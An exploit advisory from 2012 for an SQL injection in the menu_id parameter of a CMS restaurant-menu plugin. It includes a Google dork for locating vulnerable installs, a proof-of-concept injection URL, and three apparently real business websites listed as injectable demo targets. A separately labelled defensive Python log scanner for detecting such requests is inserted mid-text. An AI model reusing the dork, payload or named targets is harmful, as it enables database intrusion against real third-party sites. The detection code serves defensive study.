Restu menu Sql Vulnerability

Author: RetnOHacK , Published: 25-06-2012
---------------------------------------------------------------------------+
__________ __ ________ ___ ___ ____ __.
\______ \ _____/ |_ ____ \_____ \ / | \_____ ____ | |/ _|
| _// __ \ __\/ \ / | \/ ~ \__ \ _/ ___\| <
| | \ ___/| | | | \/ | \ Y // __ \\ \___| | \
|____|_ /\___ >__| |___| /\_______ /\___|_ /(____ /\___ >____|__ \
\/ \/ \/ \/ \/ \/ \/ \/
---------------------------------------------------------------------------+

---------------------- Vulnerability info ----------------------

[+]Title: Restu menu Sql Vulnerability
[+]Vendor: http://www.flickmedialtd.com/
[+]Date: 25/06/2012
[+]Author: RetnOHacK #Procoder'z Team Albania
[+]Email: RetnOHacK1@gmail.com , fb.me/root.procoderz
[+]Category: Webapps
[+]Dork: inurl:"/cmsadmin/" intext:"version-1.6.6"
[+]Tested on: Windows xp , Ubuntu BT~5


---------------------- Vulnerability Details ----------------------
[~]INFO:

Input passed via the "menu_id" parameter in image.php is not properly sanitised before being used in SQL queries.
This allows arbitrary SQL code to be injected through the parameter.
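
For defenders, the request shape in this advisory is enough to triage web server logs. The following is an added example, not code from the advisory or the vendor: it flags requests to image.php under /cmsadmin/plugins/ whose menu_id is not a plain integer. It assumes combined-format access logs and that legitimate menu_id values are numeric, as the URLs in this advisory suggest; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request shape taken from the advisory: image.php under /cmsadmin/plugins/<plugin>/
TARGET = re.compile(r"/cmsadmin/plugins/[^/]+/image\.php$", re.IGNORECASE)
# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_menu_id(log_line):
    """Return the decoded menu_id values that are not plain integers, else []."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not TARGET.search(unquote(url.path)):
        return []
    # parse_qs decodes one layer of percent-encoding and keeps repeated parameters.
    values = parse_qs(url.query, keep_blank_values=True).get("menu_id", [])
    flagged = []
    for value in values:
        # Decode once more so double-encoded input (%2527) is compared in clear form.
        decoded = unquote(value)
        if not re.fullmatch(r"[0-9]{1,10}", decoded):
            flagged.append(decoded)
    return flagged


def scan(lines):
    """Yield (client_ip, flagged_values) for each line with a non-integer menu_id."""
    for line in lines:
        flagged = suspicious_menu_id(line)
        if flagged:
            yield line.split(" ", 1)[0], flagged


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jun/2012:10:01:02 +0000] "GET /cmsadmin/plugins/Resturant_menu/image.php?menu_id=93 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Jun/2012:10:01:05 +0000] "GET /cmsadmin/plugins/Resturant_menu/image.php?menu_id=93%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [25/Jun/2012:10:01:09 +0000] "GET /cmsadmin/plugins/product/image.php?menu_id=63%2527 HTTP/1.1" 200 298',
    '198.51.100.7 - - [25/Jun/2012:10:02:00 +0000] "GET /index.php?menu_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, values in scan(SAMPLE_LOG):
        print(ip, values)
```

The same integer-only check applied server-side before the query is built, together with parameterised queries, closes the hole the log scan is looking for.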


[~]Exploit/p0c:

www.site.com/cmsadmin/plugins/Resturant_menu/image.php?menu_id=[SQL]'


[~]Demo site: http://www.dhakahandicrafts.com/cmsadmin/plugins/product/image.php?menu_id=63'
http://www.baburchi.biz/cmsadmin/plugins/Resturant_menu/image.php?menu_id=93'
http://www.lagateau.co.uk/cmsadmin/plugins/Resturant_menu/image.php?menu_id=2'

---------------------------------------------------------------------------+

Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U

---------------------------------------------------------------------------+
